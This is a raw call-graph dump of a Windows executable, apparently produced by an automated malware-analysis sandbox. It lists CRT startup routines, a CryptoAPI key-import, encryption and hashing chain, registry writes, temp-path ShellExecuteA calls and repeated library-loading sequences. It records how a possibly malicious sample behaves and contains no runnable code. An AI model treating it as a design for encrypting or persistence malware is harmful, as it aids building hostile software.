42e3ad 19209->19214 19210->19209 19210->19214 19211 42e3bf 19212 42e3d1 19211->19212 19215 422804 std::exception::_Tidy 66 API calls 19211->19215 19216 422804 std::exception::_Tidy 66 API calls 19212->19216 19219 42e3e3 19212->19219 19213 422804 std::exception::_Tidy 66 API calls 19213->19211 19214->19211 19214->19213 19215->19212 19216->19219 19217 42e3f5 19217->19194 19220 422804 std::exception::_Tidy 66 API calls 19217->19220 19218 422804 std::exception::_Tidy 66 API calls 19218->19217 19219->19217 19219->19218 19220->19194 19222 42e309 19221->19222 19223 42e2b1 19221->19223 19222->19173 19224 42e2c1 19223->19224 19225 422804 std::exception::_Tidy 66 API calls 19223->19225 19226 42e2d3 19224->19226 19228 422804 std::exception::_Tidy 66 API calls 19224->19228 19225->19224 19227 42e2e5 19226->19227 19230 422804 std::exception::_Tidy 66 API calls 19226->19230 19229 42e2f7 19227->19229 19231 422804 std::exception::_Tidy 66 API calls 19227->19231 19228->19226 19229->19222 19232 422804 std::exception::_Tidy 66 API calls 19229->19232 19230->19227 19231->19229 19232->19222 19233->19150 19237 42bfb2 RtlLeaveCriticalSection 19234->19237 19236 4255a6 19236->19132 19237->19236 19239 42fc60 19238->19239 19240 42fc3e 19238->19240 19239->19072 19240->19239 19241 42dc91 __ftbuf 66 API calls 19240->19241 19242 42fc59 19241->19242 19244 42db1e 19242->19244 19245 42db2a FindHandler 19244->19245 19246 42db32 19245->19246 19247 42db4d 19245->19247 19269 4251cb 19246->19269 19248 42db59 19247->19248 19252 42db93 19247->19252 19250 4251cb __ftbuf 66 API calls 19248->19250 19253 42db5e 19250->19253 19272 43015e 19252->19272 19255 4251b8 __cftof2_l 66 API calls 19253->19255 19254 4251b8 __cftof2_l 66 API calls 19264 42db3f FindHandler 19254->19264 19257 42db66 19255->19257 19259 425166 __cftof2_l 11 API calls 19257->19259 19258 42db99 19260 42dbbb 19258->19260 19261 42dba7 19258->19261 19259->19264 19262 4251b8 __cftof2_l 66 API calls 19260->19262 19282 42d421 19261->19282 19265 42dbc0 19262->19265 19264->19239 19266 4251cb __ftbuf 66 API calls 19265->19266 19268 42dbb3 19266->19268 19341 42dbea 19268->19341 19270 425e72 __getptd 66 API calls 19269->19270 19271 4251d0 19270->19271 19271->19254 19273 43016a FindHandler 19272->19273 19274 4301c4 19273->19274 19275 42c08b ___crtLCMapStringA 66 API calls 19273->19275 19276 4301e6 FindHandler 19274->19276 19277 4301c9 RtlEnterCriticalSection 19274->19277 19278 430196 19275->19278 19276->19258 19277->19276 19279 43019f InitializeCriticalSectionAndSpinCount 19278->19279 19280 4301b2 19278->19280 19279->19280 19344 4301f4 19280->19344 19283 42d430 __ftbuf 19282->19283 19284 42d485 19283->19284 19285 42d466 19283->19285 19331 42d45b 19283->19331 19290 42d4e1 19284->19290 19291 42d4c4 19284->19291 19286 4251cb __ftbuf 66 API calls 19285->19286 19289 42d46b 19286->19289 19287 429814 __87except 5 API calls 19288 42db1c 19287->19288 19288->19268 19292 4251b8 __cftof2_l 66 API calls 19289->19292 19293 42d4f4 19290->19293 19348 42d2b2 19290->19348 19294 4251cb __ftbuf 66 API calls 19291->19294 19296 42d472 19292->19296 19297 42dc3b _write_string 66 API calls 19293->19297 19298 42d4c9 19294->19298 19299 425166 __cftof2_l 11 API calls 19296->19299 19303 42d4fd 19297->19303 19300 4251b8 __cftof2_l 66 API calls 19298->19300 19299->19331 19301 42d4d1 19300->19301 19304 425166 __cftof2_l 11 API calls 19301->19304 19302 42d79f 19305 42d7ae 19302->19305 19306 42da4f WriteFile 19302->19306 19303->19302 19307 425eeb __getptd 66 API calls 19303->19307 19304->19331 19309 42d7c1 19305->19309 19310 42d869 19305->19310 19308 42da82 GetLastError 19306->19308 19313 42d781 19306->19313 19311 42d518 GetConsoleMode 19307->19311 19308->19313 19312 42dacd 19309->19312 19309->19313 19317 42d80b WriteFile 19309->19317 19316 42d943 19310->19316 19320 42d876 19310->19320 19311->19302 19314 42d541 19311->19314 19318 4251b8 __cftof2_l 66 API calls 19312->19318 19312->19331 19313->19312 19319 42daa0 19313->19319 19313->19331 19314->19302 19315 42d551 GetConsoleCP 19314->19315 19315->19313 19335 42d574 19315->19335 19316->19312 19316->19313 19321 42d9b4 WideCharToMultiByte 19316->19321 19326 42d9eb WriteFile 19316->19326 19317->19308 19317->19309 19322 42daf0 19318->19322 19323 42dabf 19319->19323 19324 42daab 19319->19324 19320->19312 19320->19313 19325 42d8e5 WriteFile 19320->19325 19321->19308 19321->19326 19328 4251cb __ftbuf 66 API calls 19322->19328 19361 4251de 19323->19361 19329 4251b8 __cftof2_l 66 API calls 19324->19329 19325->19308 19325->19320 19326->19316 19330 42da22 GetLastError 19326->19330 19328->19331 19332 42dab0 19329->19332 19330->19316 19331->19287 19334 4251cb __ftbuf 66 API calls 19332->19334 19334->19331 19335->19308 19335->19313 19336 430055 78 API calls __Stoull 19335->19336 19337 42d620 WideCharToMultiByte 19335->19337 19339 430224 WriteConsoleW CreateFileW __ftbuf 19335->19339 19340 42d6a5 WriteFile 19335->19340 19358 42de77 19335->19358 19336->19335 19337->19313 19338 42d651 WriteFile 19337->19338 19338->19308 19338->19335 19339->19335 19340->19308 19340->19335 19379 4301fd RtlLeaveCriticalSection 19341->19379 19343 42dbf0 19343->19264 19347 42bfb2 RtlLeaveCriticalSection 19344->19347 19346 4301fb 19346->19274 19347->19346 19366 4300f5 19348->19366 19350 42d2d0 19351 42d2e9 SetFilePointer 19350->19351 19352 42d2d8 19350->19352 19354 42d301 GetLastError 19351->19354 19355 42d2dd 19351->19355 19353 4251b8 __cftof2_l 66 API calls 19352->19353 19353->19355 19354->19355 19356 42d30b 19354->19356 19355->19293 19357 4251de __ftbuf 66 API calls 19356->19357 19357->19355 19359 42de3f __isleadbyte_l 76 API calls 19358->19359 19360 42de86 19359->19360 19360->19335 19362 4251cb __ftbuf 66 API calls 19361->19362 19363 4251e9 std::exception::_Tidy 19362->19363 19364 4251b8 __cftof2_l 66 API calls 19363->19364 19365 4251fc 19364->19365 19365->19331 19367 43011a 19366->19367 19368 430102 19366->19368 19370 4251cb __ftbuf 66 API calls 19367->19370 19373 430159 19367->19373 19369 4251cb __ftbuf 66 API calls 19368->19369 19371 430107 19369->19371 19372 43012b 19370->19372 19374 4251b8 __cftof2_l 66 API calls 19371->19374 19375 4251b8 __cftof2_l 66 API calls 19372->19375 19373->19350 19378 43010f 19374->19378 19376 430133 19375->19376 19377 425166 __cftof2_l 11 API calls 19376->19377 19377->19378 19378->19350 19379->19343 19381 42b1d7 RtlLeaveCriticalSection 19380->19381 19382 42b1c4 19380->19382 19381->19076 19385 42bfb2 RtlLeaveCriticalSection 19382->19385 19384 42b1d4 19384->19076 19385->19384 19400 4221dd 19386->19400 19388 414189 RtlLeaveCriticalSection 19388->18954 19389 414182 19389->19388 19390 4221dd 70 API calls 19389->19390 19390->19388 19392 4101a4 GetWindowLongA 19391->19392 19394 4101d9 19391->19394 19393 4101bf SetWindowLongA 19392->19393 19392->19394 19393->19394 19395 4101ff 19394->19395 19396 421e7e 3 API calls 19394->19396 19396->19395 19409 421de4 19397->19409 19399 421e8b 19399->18968 19401 4221ec 19400->19401 19403 422207 19400->19403 19402 4221f8 19401->19402 19401->19403 19404 4251b8 __cftof2_l 66 API calls 19402->19404 19405 4252ae 67 API calls 19403->19405 19407 42221c 19403->19407 19408 4221fd __cftof2_l 19404->19408 19405->19407 19406 425201 69 API calls 19406->19408 19407->19406 19408->19389 19410 421e07 RtlInterlockedPushEntrySList 19409->19410 19411 421df6 GetProcessHeap HeapFree 19409->19411 19410->19399 19411->19399 23138 408bf8 RegOpenKeyExA 23140 408c4b 23138->23140 23145 4038b0 RegQueryValueExA 23138->23145 23146 4038b0 RegQueryValueExA 23140->23146 23142 408c97 23147 403890 RegCloseKey 23142->23147 23144 408ca2 23145->23140 23146->23142 23147->23144 19643 42b034 19644 42b041 19643->19644 19645 42a124 __getptd 66 API calls 19644->19645 19646 42b05b 19645->19646 19647 42a124 __getptd 66 API calls 19646->19647 19648 42b074 19646->19648 19647->19648 19649 424c01 19689 429ef0 19649->19689 19651 424c0d GetStartupInfoW 19652 424c21 HeapSetInformation 19651->19652 19653 424c2c 19651->19653 19652->19653 19690 42769e HeapCreate 19653->19690 19655 424c7a 19658 424c85 19655->19658 19893 424bd8 19655->19893 19691 4260a2 GetModuleHandleW 19658->19691 19659 424c8b 19660 424c96 __RTC_Initialize 19659->19660 19661 424bd8 66 API calls 19659->19661 19716 42ce7d GetStartupInfoW 19660->19716 19661->19660 19664 424cb0 GetCommandLineA 19729 42cde6 GetEnvironmentStringsW 19664->19729 19665 424664 __amsg_exit 66 API calls 19667 424caf 19665->19667 19667->19664 19671 424664 __amsg_exit 66 API calls 19673 424cd5 19671->19673 19753 42cab5 19673->19753 19674 424cdb 19675 424ce6 19674->19675 19677 424664 __amsg_exit 66 API calls 19674->19677 19773 424443 19675->19773 19677->19675 19678 424cee 19679 424cf9 19678->19679 19680 424664 __amsg_exit 66 API calls 19678->19680 19779 42ca56 19679->19779 19680->19679 19689->19651 19690->19655 19692 4260b6 19691->19692 19693 4260bf GetProcAddress GetProcAddress GetProcAddress GetProcAddress 19691->19693 19910 425d81 19692->19910 19696 426109 TlsAlloc 19693->19696 19698 426157 TlsSetValue 19696->19698 19700 426218 19696->19700 19699 426168 19698->19699 19698->19700 19901 4243ec 19699->19901 19700->19659 19705 4261b0 RtlDecodePointer 19708 4261c5 19705->19708 19706 426213 19707 425d81 70 API calls 19706->19707 19707->19700 19708->19706 19709 42a124 __getptd 66 API calls 19708->19709 19710 4261db 19709->19710 19710->19706 19711 4261e3 RtlDecodePointer 19710->19711 19712 4261f4 19711->19712 19712->19706 19713 4261f8 19712->19713 19714 425dbe __getptd 66 API calls 19713->19714 19715 426200 GetCurrentThreadId 19714->19715 19715->19700 19717 42a124 __getptd 66 API calls 19716->19717 19728 42ce9b 19717->19728 19718 42d046 GetStdHandle 19724 42d010 19718->19724 19719 42a124 __getptd 66 API calls 19719->19728 19720 42d0aa SetHandleCount 19721 424ca4 19720->19721 19721->19664 19721->19665 19722 42d058 GetFileType 19722->19724 19723 42cf90 19723->19724 19725 42cfc7 InitializeCriticalSectionAndSpinCount 19723->19725 19726 42cfbc GetFileType 19723->19726 19724->19718 19724->19720 19724->19722 19727 42d07e InitializeCriticalSectionAndSpinCount 19724->19727 19725->19721 19725->19723 19726->19723 19726->19725 19727->19721 19727->19724 19728->19719 19728->19721 19728->19723 19728->19724 19728->19728 19730 424cc0 19729->19730 19732 42ce02 19729->19732 19742 42cd2b 19730->19742 19731 42ce17 WideCharToMultiByte 19733 42ce6f FreeEnvironmentStringsW 19731->19733 19734 42ce37 19731->19734 19732->19731 19732->19732 19733->19730 19735 42a0df __getbuf 66 API calls 19734->19735 19736 42ce3d 19735->19736 19736->19733 19737 42ce45 WideCharToMultiByte 19736->19737 19738 42ce63 FreeEnvironmentStringsW 19737->19738 19739 42ce57 19737->19739 19738->19730 19740 422804 std::exception::_Tidy 66 API calls 19739->19740 19741 42ce5f 19740->19741 19741->19738 19743 42cd45 GetModuleFileNameA 19742->19743 19744 42cd40 19742->19744 19746 42cd6c 19743->19746 19928 4259a7 19744->19928 19922 42cb91 19746->19922 19749 424cca 19749->19671 19749->19673 19750 42a0df __getbuf 66 API calls 19751 42cdae 19750->19751 19751->19749 19752 42cb91 _parse_cmdline 76 API calls 19751->19752 19752->19749 19754 42cabe 19753->19754 19756 42cac3 _strlen 19753->19756 19755 4259a7 82 API calls 19754->19755 19755->19756 19757 42a124 __getptd 66 API calls 19756->19757 19764 42cad1 19756->19764 19766 42caf8 _strlen 19757->19766 19758 42cb47 19759 422804 std::exception::_Tidy 66 API calls 19758->19759 19759->19764 19760 42a124 __getptd 66 API calls 19760->19766 19761 42cb6d 19763 422804 std::exception::_Tidy 66 API calls 19761->19763 19762 422aac __fltout2 66 API calls 19762->19766 19763->19764 19764->19674 19765 42cb84 19767 425114 __fltout2 10 API calls 19765->19767 19766->19758 19766->19760 19766->19761 19766->19762 19766->19764 19766->19765 19768 42cb90 19767->19768 19769 42e750 _parse_cmdline 76 API calls 19768->19769 19771 42cc1d 19768->19771 19769->19768 19770 42cd1b 19770->19674 19771->19770 19772 42e750 76 API calls _parse_cmdline 19771->19772 19772->19771 19774 424451 __except_handler3 19773->19774 19978 42893e 19774->19978 19776 42446f __initterm_e 19777 4249b3 76 API calls 19776->19777 19778 424490 __except_handler3 19776->19778 19777->19778 19778->19678 19780 42ca64 19779->19780 19784 42ca69 19779->19784 19781 4259a7 82 API calls 19780->19781 19781->19784 19782 424cff 19785 419d20 CoInitialize NtdllDefWindowProc_A 19782->19785 19783 42e750 _parse_cmdline 76 API calls 19783->19784 19784->19782 19784->19783 19786 419d5b 19785->19786 19787 418480 10 API calls 19786->19787 19788 419d79 GetCommandLineA 19787->19788 19789 419db0 6 API calls 19788->19789 19791 419f22 CreateMetaFileA 19789->19791 19791->19791 19792 419f35 SetBrushOrgEx LoadImageA 19791->19792 19793 423911 77 API calls 19792->19793 19794 419f7e 19793->19794 19795 41c8fa 19794->19795 19798 419fd1 FtpPutFileEx 19794->19798 19796 423189 FindHandler 66 API calls 19795->19796 19797 41dbf0 19796->19797 19799 423991 FindHandler RaiseException 19797->19799 19801 41a038 GetSysColorBrush FrameRect 19798->19801 19800 41dc07 19799->19800 19803 41a0a6 19801->19803 19804 41a0b3 GlobalAlloc GetLastError GetIconInfo GetIconInfo 19803->19804 19805 41a1fc GetDIBits GetDIBits 19804->19805 19806 41a26b __cftof2_l 19805->19806 19807 41a2c9 GetDIBits GetDIBits 19806->19807 19808 41a332 19807->19808 19809 41a343 GetDlgItem SetWindowContextHelpId 19808->19809 19809->19809 19810 41a39d __cftof2_l 19809->19810 19811 41a415 mmioSetInfo mmioAscend 19810->19811 19812 41a467 GetSystemInfo 19811->19812 19814 41a4da GetSystemTimeAsFileTime SetConsoleCtrlHandler 19812->19814 19815 41a56a CreateIoCompletionPort 19814->19815 19816 41a890 CopyImage 19815->19816 19818 41a950 19816->19818 19819 41aa1c DrawMenuBar FindResourceA 19818->19819 19820 41aa46 VirtualAlloc 19819->19820 19821 41aa72 __cftof2_l 19820->19821 19822 41aaa1 LoadLibraryA LoadIconA OleCreatePictureIndirect 19821->19822 19823 41aaf8 __cftof2_l 19822->19823 19824 41ab69 LoadLibraryA LoadIconA OleCreatePictureIndirect 19823->19824 19825 41abb0 __cftof2_l 19824->19825 19826 41ac21 LoadLibraryA LoadIconA OleCreatePictureIndirect 19825->19826 19827 41ac62 19826->19827 19828 422a18 __getbuf 66 API calls 19827->19828 19829 41adfa 19828->19829 19830 41ae43 LoadLibraryA LoadIconA OleCreatePictureIndirect 19829->19830 19831 41ae85 19830->19831 19832 422a18 __getbuf 66 API calls 19831->19832 19833 41aee0 19832->19833 19834 41af40 LoadLibraryA LoadIconA OleCreatePictureIndirect 19833->19834 19835 41af8e 19834->19835 19836 422a18 __getbuf 66 API calls 19835->19836 19837 41afe2 19836->19837 19838 41b0c0 LoadLibraryA LoadIconA OleCreatePictureIndirect 19837->19838 19839 41b102 19838->19839 19840 422a18 __getbuf 66 API calls 19839->19840 19841 41b227 __cftof2_l 19840->19841 19842 422a18 __getbuf 66 API calls 19841->19842 19843 41b2b8 19842->19843 19844 422a18 __getbuf 66 API calls 19843->19844 19845 41b361 __cftof2_l 19844->19845 19846 422a18 __getbuf 66 API calls 19845->19846 19847 41b499 19846->19847 19848 41b4e2 LoadLibraryA LoadIconA OleCreatePictureIndirect 19847->19848 19849 41b52a __cftof2_l 19848->19849 19850 422a18 __getbuf 66 API calls 19849->19850 19851 41b646 19850->19851 19852 41b6a6 LoadLibraryA LoadIconA OleCreatePictureIndirect 19851->19852 19853 41b6f6 LoadLibraryA LoadIconA OleCreatePictureIndirect 19852->19853 19855 41b765 __cftof2_l 19853->19855 19856 422a18 __getbuf 66 API calls 19855->19856 19857 41b891 __cftof2_l 19856->19857 19858 41b8fd LoadLibraryA LoadIconA OleCreatePictureIndirect 19857->19858 19859 41b94b LoadLibraryA LoadIconA OleCreatePictureIndirect 19858->19859 19861 41ba1f 19859->19861 19862 422a18 __getbuf 66 API calls 19861->19862 19863 41ba8d __cftof2_l 19862->19863 19864 422a18 __getbuf 66 API calls 19863->19864 19865 41bb3a 19864->19865 19866 41bb87 LoadLibraryA LoadIconA OleCreatePictureIndirect 19865->19866 19867 41bbd1 __cftof2_l 19866->19867 19868 422a18 __getbuf 66 API calls 19867->19868 19869 41bf0f __cftof2_l 19868->19869 19870 422a18 __getbuf 66 API calls 19869->19870 19871 41bfa4 19870->19871 19872 41c07f LoadLibraryA LoadIconA OleCreatePictureIndirect 19871->19872 19873 41c0cb 19872->19873 19874 422a18 __getbuf 66 API calls 19873->19874 19875 41c13c 19874->19875 19876 422a18 __getbuf 66 API calls 19875->19876 19877 41c27a 19876->19877 19878 41c2a6 LoadLibraryA LoadIconA OleCreatePictureIndirect 19877->19878 19879 41c2ee __cftof2_l 19878->19879 19880 422a18 __getbuf 66 API calls 19879->19880 19881 41c385 19880->19881 19882 41c3b1 LoadLibraryA LoadIconA OleCreatePictureIndirect 19881->19882 19883 41c3f3 __cftof2_l 19882->19883 19884 41c5b8 LoadLibraryA LoadIconA OleCreatePictureIndirect 19883->19884 19885 41c602 19884->19885 19886 422a18 __getbuf 66 API calls 19885->19886 19887 41c670 __cftof2_l 19886->19887 19888 41c6de LoadLibraryA LoadIconA OleCreatePictureIndirect 19887->19888 19889 41c728 __cftof2_l 19888->19889 19890 422a18 __getbuf 66 API calls 19889->19890 19891 41c86b 19890->19891 19892 41c8b4 LoadLibraryA LoadIconA OleCreatePictureIndirect 19891->19892 19892->19795 19894 424be6 19893->19894 19895 424beb 19893->19895 19897 426517 __amsg_exit 66 API calls 19894->19897 19896 426368 __amsg_exit 66 API calls 19895->19896 19898 424bf3 19896->19898 19897->19895 19899 4243c2 __amsg_exit 3 API calls 19898->19899 19900 424bfd 19899->19900 19900->19658 19920 425cfe RtlEncodePointer 19901->19920 19903 4243f4 19921 42af49 RtlEncodePointer 19903->19921 19905 42441a RtlEncodePointer RtlEncodePointer RtlEncodePointer RtlEncodePointer 19906 42bf11 19905->19906 19907 42bf1c 19906->19907 19908 42bf26 InitializeCriticalSectionAndSpinCount 19907->19908 19909 4261ac 19907->19909 19908->19907 19908->19909 19909->19705 19909->19706 19911 425d8b RtlDecodePointer 19910->19911 19913 425d9a 19910->19913 19911->19913 19912 425dab TlsFree 19914 425db9 19912->19914 19913->19912 19913->19914 19915 42bf77 RtlDeleteCriticalSection 19914->19915 19917 42bf8f 19914->19917 19916 422804 std::exception::_Tidy 66 API calls 19915->19916 19916->19914 19918 4260bb 19917->19918 19919 42bfa1 RtlDeleteCriticalSection 19917->19919 19918->19659 19919->19917 19920->19903 19921->19905 19923 42cbb0 19922->19923 19927 42cc1d 19923->19927 19932 42e750 19923->19932 19925 42cd1b 19925->19749 19925->19750 19926 42e750 76 API calls _parse_cmdline 19926->19927 19927->19925 19927->19926 19929 4259b0 19928->19929 19931 4259b7 19928->19931 19938 42580d 19929->19938 19931->19743 19935 42e6e4 19932->19935 19936 42224b ___crtLCMapStringA 76 API calls 19935->19936 19937 42e6f7 19936->19937 19937->19923 19939 425819 FindHandler 19938->19939 19940 425eeb __getptd 66 API calls 19939->19940 19941 425822 19940->19941 19942 425504 ___crtLCMapStringA 68 API calls 19941->19942 19943 42582c 19942->19943 19967 4255a8 19943->19967 19946 42596c FindHandler 19946->19931 19947 42a0df __getbuf 66 API calls 19948 42584d 19947->19948 19948->19946 19949 42587d InterlockedDecrement 19948->19949 19950 425979 19948->19950 19951 42589e InterlockedIncrement 19949->19951 19953 42588d 19949->19953 19950->19946 19952 42598c 19950->19952 19956 422804 std::exception::_Tidy 66 API calls 19950->19956 19951->19946 19954 4258b4 19951->19954 19955 4251b8 __cftof2_l 66 API calls 19952->19955 19953->19951 19957 422804 std::exception::_Tidy 66 API calls 19953->19957 19954->19946 19958 42c08b ___crtLCMapStringA 66 API calls 19954->19958 19955->19946 19956->19952 19959 42589d 19957->19959 19960 4258c8 InterlockedDecrement 19958->19960 19959->19951 19962 425944 19960->19962 19963 425957 InterlockedIncrement 19960->19963 19962->19963 19965 422804 std::exception::_Tidy 66 API calls 19962->19965 19974 42596e 19963->19974 19966 425956 19965->19966 19966->19963 19968 42224b ___crtLCMapStringA 76 API calls 19967->19968 19969 4255bc 19968->19969 19970 4255c7 GetOEMCP 19969->19970 19971 4255e5 19969->19971 19973 4255d7 19970->19973 19972 4255ea GetACP 19971->19972 19971->19973 19972->19973 19973->19946 19973->19947 19977 42bfb2 RtlLeaveCriticalSection 19974->19977 19976 425975 19976->19946 19977->19976 19979 428944 RtlEncodePointer 19978->19979 19979->19979 19980 42895e 19979->19980 19980->19776 21045 405d1c 21046 405d38 21045->21046 21077 406102 21045->21077 21046->21077 21113 4054b8 21046->21113 21051 405858 3 API calls 21052 405dfe 21051->21052 21126 4017e8 21052->21126 21062 4060b0 21160 4013dc GetProcessHeap RtlAllocateHeap 21062->21160 21063 406056 21141 405894 21063->21141 21066 405eaf 21066->21062 21066->21063 21068 4060ae 21072 4060fa 21068->21072 21073 406107 21068->21073 21070 40607a 21071 405894 6 API calls 21070->21071 21071->21068 21161 401440 GetProcessHeap HeapFree 21072->21161 21162 401440 GetProcessHeap HeapFree 21073->21162 21076 40610f 21076->21077 21163 4013dc GetProcessHeap RtlAllocateHeap 21076->21163 21079 4061c5 21080 4061d8 21079->21080 21081 4061cb 21079->21081 21166 4013dc GetProcessHeap RtlAllocateHeap 21080->21166 21165 401440 GetProcessHeap HeapFree 21081->21165 21085 4061e1 21167 4059bc 21085->21167 21087 40614f 21087->21077 21087->21079 21164 401460 GetProcessHeap RtlReAllocateHeap 21087->21164 21089 4017e8 CryptAcquireContextA 21090 406222 21089->21090 21181 401374 21090->21181 21095 401404 CryptHashData 21096 406261 21095->21096 21097 401404 CryptHashData 21096->21097 21098 40627e 21097->21098 21099 401404 CryptHashData 21098->21099 21100 406292 21099->21100 21187 401490 21100->21187 21105 401b20 CryptReleaseContext 21106 4062c4 21105->21106 21107 4062db 21106->21107 21108 4062fd 21106->21108 21193 401440 GetProcessHeap HeapFree 21107->21193 21195 401440 GetProcessHeap HeapFree 21108->21195 21111 4062e3 21194 401440 GetProcessHeap HeapFree 21111->21194 21114 4054cb 21113->21114 21118 405567 21114->21118 21196 401844 wsprintfA 21114->21196 21115 40560f 21119 405858 21115->21119 21118->21115 21197 401844 wsprintfA 21118->21197 21120 4017e8 CryptAcquireContextA 21119->21120 21121 405877 21120->21121 21198 40153c 21121->21198 21124 401b20 CryptReleaseContext 21125 40588f 21124->21125 21125->21051 21127 40181e 21126->21127 21128 401801 CryptAcquireContextA 21126->21128 21129 4018a0 21127->21129 21128->21127 21130 4018da 21129->21130 21131 4018b9 CryptImportKey 21129->21131 21132 401ab0 21130->21132 21131->21130 21133 401aee 21132->21133 21134 401ac9 CryptEncrypt 21132->21134 21135 401af8 21133->21135 21134->21133 21136 401b0b CryptDestroyKey 21135->21136 21137 401b18 21135->21137 21136->21137 21138 401b20 21137->21138 21139 401b47 21138->21139 21140 401b36 CryptReleaseContext 21138->21140 21139->21066 21140->21139 21142 4017e8 CryptAcquireContextA 21141->21142 21143 4058bb 21142->21143 21144 4018a0 CryptImportKey 21143->21144 21145 405904 21144->21145 21201 401574 21145->21201 21148 401574 CryptSetKeyParam 21149 405936 21148->21149 21150 405945 21149->21150 21152 405960 21149->21152 21151 401ab0 CryptEncrypt 21150->21151 21153 40595e 21151->21153 21154 401ab0 CryptEncrypt 21152->21154 21155 401af8 CryptDestroyKey 21153->21155 21154->21153 21156 4059a9 21155->21156 21157 401b20 CryptReleaseContext 21156->21157 21158 4059b3 21157->21158 21159 4013dc GetProcessHeap RtlAllocateHeap 21158->21159 21159->21070 21160->21068 21161->21077 21162->21076 21163->21087 21164->21087 21165->21077 21166->21085 21168 4059d6 21167->21168 21169 4059e3 21167->21169 21168->21089 21169->21168 21170 4017e8 CryptAcquireContextA 21169->21170 21171 405a0f 21170->21171 21172 4018a0 CryptImportKey 21171->21172 21173 405a58 21172->21173 21174 401574 CryptSetKeyParam 21173->21174 21175 405a71 21174->21175 21204 4017a4 21175->21204 21177 405a9c 21178 401af8 CryptDestroyKey 21177->21178 21179 405ad2 21178->21179 21180 401b20 CryptReleaseContext 21179->21180 21180->21168 21182 4013aa 21181->21182 21183 40138d CryptCreateHash 21181->21183 21184 401404 21182->21184 21183->21182 21185 401436 21184->21185 21186 40141d CryptHashData 21184->21186 21185->21095 21186->21185 21188 4014a9 CryptGetHashParam 21187->21188 21189 4014c6 21187->21189 21188->21189 21190 4014d0 21189->21190 21191 4014e3 CryptDestroyHash 21190->21191 21192 4014f0 21190->21192 21191->21192 21192->21105 21193->21111 21194->21077 21195->21077 21196->21114 21197->21118 21199 401555 CryptGenRandom 21198->21199 21200 40156a 21198->21200 21199->21200 21200->21124 21202 40158d CryptSetKeyParam 21201->21202 21203 4015a6 21201->21203 21202->21203 21203->21148 21205 4017de 21204->21205 21206 4017bd CryptDecrypt 21204->21206 21205->21177 21206->21205 21212 42a355 21218 42a303 __CallSettingFrame@12 21212->21218 21213 42a36a 21226 42a38f 21213->21226 21216 42a380 FindHandler 21218->21213 21220 42af11 21218->21220 21219 42af11 FindHandler 69 API calls 21219->21216 21231 429ef0 21220->21231 21222 42af1d RtlDecodePointer 21225 42af2d 21222->21225 21232 42aec5 21225->21232 21227 425eeb __getptd 66 API calls 21226->21227 21229 42a394 21227->21229 21228 42a376 21228->21216 21228->21219 21229->21228 21230 425eeb __getptd 66 API calls 21229->21230 21230->21228 21231->21222 21233 42aed1 FindHandler 21232->21233 21234 425eeb __getptd 66 API calls 21233->21234 21235 42aed6 21234->21235 21238 4262ee 21235->21238 21247 42c113 RtlDecodePointer 21238->21247 21240 4262f3 21241 4262fe 21240->21241 21248 42c120 21240->21248 21245 426316 21241->21245 21269 424feb 21241->21269 21244 424630 __amsg_exit 66 API calls 21246 426320 21244->21246 21245->21244 21247->21240 21249 42c12c FindHandler 21248->21249 21250 42c153 21249->21250 21251 42c187 21249->21251 21254 42c169 RtlDecodePointer 21249->21254 21257 42c14f 21249->21257 21253 425e72 __getptd 66 API calls 21250->21253 21251->21254 21255 42c196 21251->21255 21258 42c158 _siglookup 21253->21258 21254->21258 21256 4251b8 __cftof2_l 66 API calls 21255->21256 21259 42c19b 21256->21259 21257->21250 21257->21255 21260 424630 __amsg_exit 66 API calls 21258->21260 21261 42c1f3 21258->21261 21268 42c161 FindHandler 21258->21268 21262 425166 __cftof2_l 11 API calls 21259->21262 21260->21261 21263 42c08b ___crtLCMapStringA 66 API calls 21261->21263 21264 42c1fe 21261->21264 21262->21268 21263->21264 21266 42c233 21264->21266 21275 425cfe RtlEncodePointer 21264->21275 21276 42c287 21266->21276 21268->21241 21270 42500a __cftof2_l __87except 21269->21270 21271 425028 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 21270->21271 21274 4250f6 __87except 21271->21274 21272 429814 __87except 5 API calls 21273 425112 21272->21273 21273->21245 21274->21272 21275->21266 21277 42c28d 21276->21277 21279 42c294 21276->21279 21280 42bfb2 RtlLeaveCriticalSection 21277->21280 21279->21268 21280->21279 21355 407f1c 21357 407f20 21355->21357 21356 40804e 21357->21356 21359 407e28 21357->21359 21360 407e49 21359->21360 21361 407e6d 21359->21361 21363 407eed 21360->21363 21364 407e5a 21360->21364 21374 407e68 21360->21374 21362 407e7f lstrcmpi 21361->21362 21361->21374 21365 407eac 21362->21365 21370 407e93 21362->21370 21373 407474 27 API calls 21363->21373 21366 407e61 21364->21366 21367 407eb8 21364->21367 21392 407240 21365->21392 21372 407474 27 API calls 21366->21372 21366->21374 21398 407d3c GetTempPathA 21367->21398 21375 407474 21370->21375 21372->21374 21373->21374 21374->21357 21376 407493 21375->21376 21410 4072c4 21376->21410 21379 405894 6 API calls 21380 4074be 21379->21380 21414 4013dc GetProcessHeap RtlAllocateHeap 21380->21414 21382 4074c6 21383 405894 6 API calls 21382->21383 21384 4074e6 21383->21384 21385 4074ef RegCreateKeyExA 21384->21385 21386 407515 RegCreateKeyExA 21384->21386 21387 407539 21385->21387 21386->21387 21415 403930 RegSetValueExA 21387->21415 21389 407550 21416 403890 RegCloseKey 21389->21416 21391 40755b 21391->21374 21393 407259 21392->21393 21417 4071d4 21393->21417 21396 407271 21396->21374 21399 407d6e 21398->21399 21400 407e18 21399->21400 21531 403c28 21399->21531 21400->21374 21402 407db5 21403 407db9 ShellExecuteA 21402->21403 21404 407e1a 21402->21404 21403->21400 21405 407dd9 21403->21405 21406 407240 26 API calls 21404->21406 21538 401864 wsprintfA 21405->21538 21406->21400 21408 407de6 21409 407240 26 API calls 21408->21409 21409->21400 21411 4072dc 21410->21411 21412 406eec 17 API calls 21411->21412 21413 4072fd 21412->21413 21413->21379 21414->21382 21415->21389 21416->21391 21418 4071f1 21417->21418 21419 407231 21417->21419 21424 4064bc 21418->21424 21419->21396 21423 401440 GetProcessHeap HeapFree 21419->21423 21421 4071fc 21437 405d20 21421->21437 21423->21396 21425 4064d8 21424->21425 21426 40651f GetVersionExA 21425->21426 21505 401864 wsprintfA 21426->21505 21428 406549 21506 401864 wsprintfA 21428->21506 21430 406572 21507 401864 wsprintfA 21430->21507 21432 406593 21508 403ea0 21432->21508 21436 4065f2 21436->21421 21438 405d38 21437->21438 21470 406102 21437->21470 21439 4054b8 wsprintfA 21438->21439 21438->21470 21440 405dde 21439->21440 21441 405858 3 API calls 21440->21441 21442 405dee 21441->21442 21443 405858 3 API calls 21442->21443 